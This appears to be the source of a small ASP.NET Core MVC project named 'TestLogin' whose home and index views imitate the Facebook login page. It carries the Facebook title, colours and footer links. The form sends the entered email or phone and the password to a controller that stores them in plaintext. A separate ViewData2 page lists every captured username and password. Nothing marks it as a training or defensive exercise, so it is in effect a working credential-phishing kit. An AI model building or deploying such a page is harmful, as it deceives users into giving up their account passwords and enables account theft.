TestLogin/Models/DataInputted.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;

namespace TestLogin.Models
{
    public class DataInputted
    {
        public int ID { get; set; }
        public string Username { get; set; }
        public string Password { get; set; }
    }
}

TestLogin/Models/ErrorViewModel.cs
using System;

namespace TestLogin.Models
{
    public class ErrorViewModel
    {
        public string RequestId { get; set; }

        public bool ShowRequestId => !string.IsNullOrEmpty(RequestId);
    }
}

TestLogin/Controllers/DataInputtedController.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Rendering;
using Microsoft.EntityFrameworkCore;
using TestLogin.Models;

namespace TestLogin.Controllers
{
    public class DataInputtedController : Controller
    {
        private readonly TestLoginContext _context;

        public DataInputtedController(TestLoginContext context)
        {
            _context = context;
        }

        // GET: DataInputted
        public IActionResult Index()
        {
            return View();
        }

        public async Task<IActionResult> ViewData2()
        {
            return View(await _context.DataInputted.ToListAsync());
        }

        // GET: DataInputted/Create
        public IActionResult Create()
        {
            return View();
        }

        // POST: DataInputted/Create
        // To protect from overposting attacks, please enable the specific properties you want to bind to, for 
        // more details see http://go.microsoft.com/fwlink/?LinkId=317598.
        [HttpPost]
        [ValidateAntiForgeryToken]
        public async Task<IActionResult> Create([Bind("ID,Username,Password")] DataInputted dataInputted)
        {
            if (ModelState.IsValid)
            {
                _context.Add(dataInputted);
                await _context.SaveChangesAsync();
                return RedirectToAction(nameof(Index));
            }
            return View();
        }

        // GET: DataInputted/Edit/5
        public async Task<IActionResult> Edit(int? id)
        {
            if (id == null)
            {
                return NotFound();
            }

            var dataInputted = await _context.DataInputted.SingleOrDefaultAsync(m => m.ID == id);
            if (dataInputted == null)
            {
                return NotFound();
            }
            return View(dataInputted);
        }

        // POST: DataInputted/Edit/5
        // To protect from overposting attacks, please enable the specific properties you want to bind to, for 
        // more details see http://go.microsoft.com/fwlink/?LinkId=317598.
        [HttpPost]
        [ValidateAntiForgeryToken]
        public async Task<IActionResult> Edit(int id, [Bind("ID,Username,Password")] DataInputted dataInputted)
        {
            if (id != dataInputted.ID)
            {
                return NotFound();
            }

            if (ModelState.IsValid)
            {
                try
                {
                    _context.Update(dataInputted);
                    await _context.SaveChangesAsync();
                }
                catch (DbUpdateConcurrencyException)
                {
                    if (!DataInputtedExists(dataInputted.ID))
                    {
                        return NotFound();
                    }
                    else
                    {
                        throw;
                    }
                }
                return RedirectToAction(nameof(Index));
            }
            return View(dataInputted);
        }

        // GET: DataInputted/Delete/5
        public async Task<IActionResult> Delete(int? id)
        {
            if (id == null)
            {
                return NotFound();
            }

            var dataInputted = await _context.DataInputted
                .SingleOrDefaultAsync(m => m.ID == id);
            if (dataInputted == null)
            {
                return NotFound();
            }

            return View(dataInputted);
        }

        // POST: DataInputted/Delete/5
        [HttpPost, ActionName("Delete")]
        [ValidateAntiForgeryToken]
        public async Task<IActionResult> DeleteConfirmed(int id)
        {
            var dataInputted = await _context.DataInputted.SingleOrDefaultAsync(m => m.ID == id);
            _context.DataInputted.Remove(dataInputted);
            await _context.SaveChangesAsync();
            return RedirectToAction(nameof(Index));
        }

        private bool DataInputtedExists(int id)
        {
            return _context.DataInputted.Any(e => e.ID == id);
        }
    }
}

TestLogin/Controllers/HomeController.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using TestLogin.Models;

namespace TestLogin.Controllers
{
    public class HomeController : Controller
    {
        public IActionResult Index()
        {
            return View();
        }

        public IActionResult About()
        {
            ViewData["Message"] = "Your application description page.";

            return View();
        }

        public IActionResult Contact()
        {
            ViewData["Message"] = "Your contact page.";

            return View();
        }

        public IActionResult Error()
        {
            return View(new ErrorViewModel { RequestId = Activity.Current?.Id ?? HttpContext.TraceIdentifier });
        }
    }
}

TestLogin/Views/DataInputted/Index.cshtml
@model TestLogin.Models.DataInputted
@{
    ViewData["Title"] = "Log into Facebook | Facebook";
}
<title>Log into Facebook | Facebook</title>
<div class="navbars">

    <img id="headimg" src="~/images/edited.png" />
    <hr class="line1" />
    <button type="button" id="buttonSign">Sign Up</button>
    <p id="text1">Connect and share with the people in your life.</p>

</div>

<br />
<br />

<div class="container">
    <h3>Facebook Login</h3>
    <hr />
    <form asp-controller="DataInputted" asp-action="Create">
        <label>Email or Phone:  </label>
        <input asp-for="Username" id="tbox2" type="text" /><br />
        <div class="adjust">
            <label>Password:  </label>
            <input asp-for="Password" class="tbox" type="password" /><br />
        </div>
        <input id="checkb" type="checkbox" />
        <div class="adjust2">
            <label id="lab3">Keep me logged in</label>
        </div>
        <br />
        <button id="but2" type="submit">Log In</button>
        <p id="ora"> or <a class="anch">Sign up for Facebook</a></p> <br />
        <a id="lasta">Forgot your password?</a>
    </form>
</div>
<ul>
    <li>English (US)</li>
    <li>Español</li>
    <li>Portugués (Brasil)</li>
    <li>Français (France)</li>
    <li>Deutsch</li>
    <li>Italiano</li>
</ul>
<br />
<hr id="line2" />
<table id="list2">
    <tr>
        <td>Mobile</td>
        <td>Find Friends</td>
        <td>Badges</td>
        <td id="other">People</td>
        <td>Pages</td>
        <td>Places</td>
        <td>Apps</td>
        <td>Games</td>
        <td>Music</td>
    </tr>
    <tr>
        <td>About</td>
        <td>Create an Ad</td>
        <td>Create a Page</td>
        <td>Developers</td>
        <td>Careers</td>
        <td>Privacy</td>
        <td>Cookies</td>
        <td>Terms</td>
        <td>Help</td>
    </tr>
</table>








<style>
    #other {
        margin-left: 20px;
    }

    #list2 {
        margin-left: 100px;
    }

    ul {
        margin-left: 266px;
    }

    td, li {
        padding-left: 15px;
        float: left;
        font-size: 12px;
        font-family: Helvetica;
        color: rgb(59, 89, 152);
        text-decoration: none;
        overflow: hidden;
    }

    #lasta {
        font-family: Helvetica;
        font-size: 12px;
        margin-left: 242px;
        text-decoration-line: none;
        text-decoration-color: none;
        text-decoration-style: none;
        color: rgb(59, 89, 152);
    }

    #but2 {
        border-top: 0.5px solid rgb(138, 156, 194);
        border-left: 0.5px solid rgb(41, 68, 126);
        border-right: 0.5px solid rgb(41, 68, 126);
        border-bottom: 0.5px solid rgb(41, 68, 126);
        color: white;
        padding: 3px 7px;
        margin-left: 242px;
        background-color: rgb(98, 122, 172);
        font-family: Helvetica;
        font-weight: 700;
    }

    #ora {
        font-family: Helvetica;
        font-size: 12px;
        font-weight: 600;
    }

    #ora {
        margin-left: 303px;
        margin-top: -19.7px;
    }

    a.anch {
        text-decoration: none;
        text-decoration-line: none;
        text-decoration-color: none;
        font-family: Helvetica;
        font-size: 12px;
        font-weight: 700;
        color: rgb(59, 89, 152);
    }

    .adjust2 {
        margin-top: -21px;
        margin-left: 118px;
    }

    .adjust {
        margin-top: 10px;
    }

    .container {
        border: 1px solid rgba(204, 204, 204,0.8);
        border-radius: 5px;
        margin-left: 320px;
        margin-right: 320px;
        padding: 10px 10px 10px 10px;
    }

    .navbars {
        border: 5px solid rgba(59, 89, 152,1);
        background-color: rgba(59, 89, 152,1);
        height: 145px;
        margin-left: -10px;
        margin-right: -10px;
        margin-top: -10px;
    }

    .line1 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(102, 132, 184);
    }

    #line2 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(204, 204, 204);
    }

    #headimg {
        margin-left: 150px;
        margin-top: 16px;
        height: 50px;
        width: 210px;
    }

    #buttonSign {
        color: white;
        display: inline-block;
        background-color: rgb(117, 173, 91);
        border-top: 0.5px solid rgb(152, 194, 134);
        border-left: 0.5px solid rgb(59, 110, 34);
        border-right: 0.5px solid rgb(59, 110, 34);
        border-bottom: 0.5px solid rgb(59, 110, 34);
        margin-top: 5px;
        margin-left: 155px;
        padding: 4px 7px;
        padding-bottom: 4px;
        font-size: 14px;
        font-family: Helvetica;
        text-align: center;
        font-weight: 600;
    }

    #text1 {
        font-size: 16px;
        color: white;
        margin-top: -19.7px;
        margin-left: 240px;
        font-family: Arial;
        font-weight: 600;
    }

    label {
        margin-left: 145px;
        font-family: Helvetica;
        color: rgb(102, 102, 102);
        font-size: 11px;
        font-weight: 700;
    }

    .tbox {
        margin-left: 36px;
    }

    #tbox2 {
        margin-left: 8px;
    }

    h3 {
        font-family: Helvetica;
        font-weight: 600;
    }

    #checkb {
        margin-top: 10px;
        margin-left: 239px;
    }
</style>





TestLogin/Views/DataInputted/ViewData2.cshtml
@model IEnumerable<TestLogin.Models.DataInputted>

@{
    ViewData["Title"] = "Index";
}

@*<h2>Index</h2>*@

@*<p>
        <a asp-action="Create">Create New</a>
    </p>*@
<table class="table">
    <thead>
        <tr>
            <th>
                @Html.DisplayNameFor(model => model.Username)
            </th>
            <th>
                @Html.DisplayNameFor(model => model.Password)
            </th>
            <th></th>
        </tr>
    </thead>
    <tbody>
        @foreach (var item in Model)
        {
            <tr>
                <td>
                    @Html.DisplayFor(modelItem => item.Username)
                </td>
                <td>
                    @Html.DisplayFor(modelItem => item.Password)
                </td>
                @*<td>
                        <a asp-action="Edit" asp-route-id="@item.ID">Edit</a> |
                        <a asp-action="Details" asp-route-id="@item.ID">Details</a> |
                        <a asp-action="Delete" asp-route-id="@item.ID">Delete</a>
                    </td>*@
            </tr>
        }
    </tbody>
</table>

TestLogin/Views/Home/About.cshtml
@{
    ViewData["Title"] = "About";
}
<h2>@ViewData["Title"]</h2>
<h3>@ViewData["Message"]</h3>

<p>Use this area to provide additional information.</p>

TestLogin/Views/Home/Contact.cshtml
@{
    ViewData["Title"] = "Contact";
}
<h2>@ViewData["Title"]</h2>
<h3>@ViewData["Message"]</h3>

<address>
    One Microsoft Way<br />
    Redmond, WA 98052-6399<br />
    <abbr title="Phone">P:</abbr>
    425.555.0100
</address>

<address>
    <strong>Support:</strong> <a href="mailto:Support@example.com">Support@example.com</a><br />
    <strong>Marketing:</strong> <a href="mailto:Marketing@example.com">Marketing@example.com</a>
</address>

TestLogin/Views/Home/Index.cshtml
@model TestLogin.Models.DataInputted
@{
    ViewData["Title"] = "Log into Facebook | Facebook";
}
<title>Log into Facebook | Facebook</title>
<div class="navbars">
    
        <img id="headimg" src="~/images/edited.png" />
        <hr class="line1" />
        <button type="button" id="buttonSign">Sign Up</button>
        <p id="text1">Connect and share with the people in your life.</p>
   
</div>

<br />
<br />

<div class="container">
    <h3>Facebook Login</h3>
    <hr />
    <form asp-controller="DataInputted" asp-action="Create">
        <label>Email or Phone:  </label>
        <input asp-for="Username" id="tbox2" type="text" /><br />
        <div class="adjust">
            <label>Password:  </label>
            <input asp-for="Password" class="tbox" type="password" /><br />
        </div>
        <input id="checkb" type="checkbox"/>
        <div class="adjust2">
            <label id="lab3">Keep me logged in</label>
        </div>
        <br />
        <button id="but2" type="submit">Log In</button>
        <p id="ora"> or <a class="anch">Sign up for Facebook</a></p> <br />
        <a id="lasta">Forgot your password?</a>
    </form>
</div>
<ul>
    <li>English (US)</li>
    <li>Español</li>
    <li>Portugués (Brasil)</li>
    <li>Français (France)</li>
    <li>Deutsch</li>
    <li>Italiano</li>
</ul>
<br />
<hr id="line2" />
<table id="list2">
    <tr>
        <td>Mobile</td>
        <td>Find Friends</td>
        <td>Badges</td>
        <td id="other">People</td>
        <td>Pages</td>
        <td>Places</td>
        <td>Apps</td>
        <td>Games</td>
        <td>Music</td>
    </tr>
    <tr>
        <td>About</td>
        <td>Create an Ad</td>
        <td>Create a Page</td>
        <td>Developers</td>
        <td>Careers</td>
        <td>Privacy</td>
        <td>Cookies</td>
        <td>Terms</td>
        <td>Help</td>
    </tr>
</table>








<style>
    #other{
        margin-left:20px;
    }
    #list2 {
        margin-left: 100px;
    }
    ul {
        margin-left: 266px;
    }
   td, li {
        padding-left: 15px;
        float: left;
        font-size: 12px;
        font-family: Helvetica;
        color: rgb(59, 89, 152);
        text-decoration: none;
        overflow:hidden;
    }
    #lasta {
        font-family:Helvetica;
        font-size: 12px;
        margin-left:242px;
        text-decoration-line: none;
        text-decoration-color: none;
        text-decoration-style: none;
        color: rgb(59, 89, 152);
    }
    #but2 {
        border-top: 0.5px solid rgb(138, 156, 194);
        border-left: 0.5px solid rgb(41, 68, 126);
        border-right: 0.5px solid rgb(41, 68, 126);
        border-bottom: 0.5px solid rgb(41, 68, 126);
        color:white;
        padding: 3px 7px;
        margin-left: 242px;
        background-color: rgb(98, 122, 172);
        font-family:Helvetica;
        font-weight: 700;
    }
    #ora{
        font-family:Helvetica;
        font-size:12px;
        font-weight: 600;
    }
    #ora {
        margin-left: 303px;
        margin-top: -19.7px;
    }
    a.anch { 
        text-decoration: none;
        text-decoration-line: none;
        text-decoration-color: none;
        font-family: Helvetica;
        font-size: 12px;
        font-weight:700;
        color: rgb(59, 89, 152);
    }
    .adjust2{
        margin-top: -21px;
        margin-left: 118px;
    }
    .adjust{
        margin-top: 10px;
    }
    .container {
        border: 1px solid rgba(204, 204, 204,0.8);
        border-radius: 5px;
        margin-left: 320px;
        margin-right:320px;
        padding:10px 10px 10px 10px;
    }
    .navbars {
        border: 5px solid rgba(59, 89, 152,1);
        background-color: rgba(59, 89, 152,1);
        height: 145px;
        margin-left:-10px;
        margin-right:-10px;
        margin-top:-10px;
    }
    .line1 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(102, 132, 184);
    }
    #line2 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(204, 204, 204);
    }
    #headimg{
        margin-left:150px;
        margin-top:16px;
        height:50px;
        width:210px;
    }
    #buttonSign {
        color: white;
        display: inline-block;
        background-color: rgb(117, 173, 91);
        border-top: 0.5px solid rgb(152, 194, 134);
        border-left: 0.5px solid rgb(59, 110, 34);
        border-right: 0.5px solid rgb(59, 110, 34);
        border-bottom: 0.5px solid rgb(59, 110, 34);
        margin-top: 5px;
        margin-left: 155px;
        padding: 4px 7px;
        padding-bottom: 4px;
        font-size: 14px;
        font-family: Helvetica;
        text-align: center;
        font-weight: 600;
    }
    #text1 {
        font-size: 16px;
        color: white;
        margin-top: -19.7px;
        margin-left: 240px;
        font-family: Arial;
        font-weight:600;
    }
    label {
        margin-left: 145px;
        font-family: Helvetica;
        color: rgb(102, 102, 102);
        font-size: 11px;
        font-weight:700;
        
    }
    .tbox{
        margin-left: 36px;
    }
    #tbox2{
        margin-left: 8px;
    }
    h3 {
        font-family: Helvetica;
        font-weight: 600;
        
    }
    #checkb{
        margin-top: 10px;
        margin-left:239px;
    }
  

</style>


























@*<div id="myCarousel" class="carousel slide" data-ride="carousel" data-interval="6000">
    <ol class="carousel-indicators">
        <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
        <li data-target="#myCarousel" data-slide-to="1"></li>
        <li data-target="#myCarousel" data-slide-to="2"></li>
        <li data-target="#myCarousel" data-slide-to="3"></li>
    </ol>
    <div class="carousel-inner" role="listbox">
        <div class="item active">
            <img src="~/images/banner1.svg" alt="ASP.NET" class="img-responsive" />
            <div class="carousel-caption" role="option">
                <p>
                    Learn how to build ASP.NET apps that can run anywhere.
                    <a class="btn btn-default" href="https://go.microsoft.com/fwlink/?LinkID=525028&clcid=0x409">
                        Learn More
                    </a>
                </p>
            </div>
        </div>
        <div class="item">
            <img src="~/images/banner2.svg" alt="Visual Studio" class="img-responsive" />
            <div class="carousel-caption" role="option">
                <p>
                    There are powerful new features in Visual Studio for building modern web apps.
                    <a class="btn btn-default" href="https://go.microsoft.com/fwlink/?LinkID=525030&clcid=0x409">
                        Learn More
                    </a>
                </p>
            </div>
        </div>
        <div class="item">
            <img src="~/images/banner3.svg" alt="Package Management" class="img-responsive" />
            <div class="carousel-caption" role="option">
                <p>
                    Bring in libraries from NuGet and npm, and automate tasks using Grunt or Gulp.
                    <a class="btn btn-default" href="https://go.microsoft.com/fwlink/?LinkID=525029&clcid=0x409">
                        Learn More
                    </a>
                </p>
            </div>
        </div>
        <div class="item">
            <img src="~/images/banner4.svg" alt="Microsoft Azure" class="img-responsive" />
            <div class="carousel-caption" role="option">
                <p>
                    Learn how Microsoft's Azure cloud platform allows you to build, deploy, and scale web apps.
                    <a class="btn btn-default" href="https://go.microsoft.com/fwlink/?LinkID=525027&clcid=0x409">
                        Learn More
                    </a>
                </p>
            </div>
        </div>
    </div>
    <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
        <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
        <span class="sr-only">Previous</span>
    </a>
    <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
        <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
        <span class="sr-only">Next</span>
    </a>
</div>

<div class="row">
    <div class="col-md-3">
        <h2>Application uses</h2>
        <ul>
            <li>Sample pages using ASP.NET Core MVC</li>
            <li>Theming using <a href="https://go.microsoft.com/fwlink/?LinkID=398939">Bootstrap</a></li>
        </ul>
    </div>
    <div class="col-md-3">
        <h2>How to</h2>
        <ul>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=398600">Add a Controller and View</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=699315">Manage User Secrets using Secret Manager.</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=699316">Use logging to log a message.</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=699317">Add packages using NuGet.</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=699319">Target development, staging or production environment.</a></li>
        </ul>
    </div>
    <div class="col-md-3">
        <h2>Overview</h2>
        <ul>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=518008">Conceptual overview of what is ASP.NET Core</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=699320">Fundamentals of ASP.NET Core such as Startup and middleware.</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=398602">Working with Data</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkId=398603">Security</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=699321">Client side development</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=699322">Develop on different platforms</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=699323">Read more on the documentation site</a></li>
        </ul>
    </div>
    <div class="col-md-3">
        <h2>Run &amp; Deploy</h2>
        <ul>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=517851">Run your app</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=517853">Run tools such as EF migrations and more</a></li>
            <li><a href="https://go.microsoft.com/fwlink/?LinkID=398609">Publish to Microsoft Azure Web Apps</a></li>
        </ul>
    </div>
</div>*@

TestLogin/Views/Shared/_Layout.cshtml
<!DOCTYPE html>
<html>
<head>
 
</head>
<body>
    
        @RenderBody()
       
    @RenderSection("Scripts", required: false)
</body>
</html>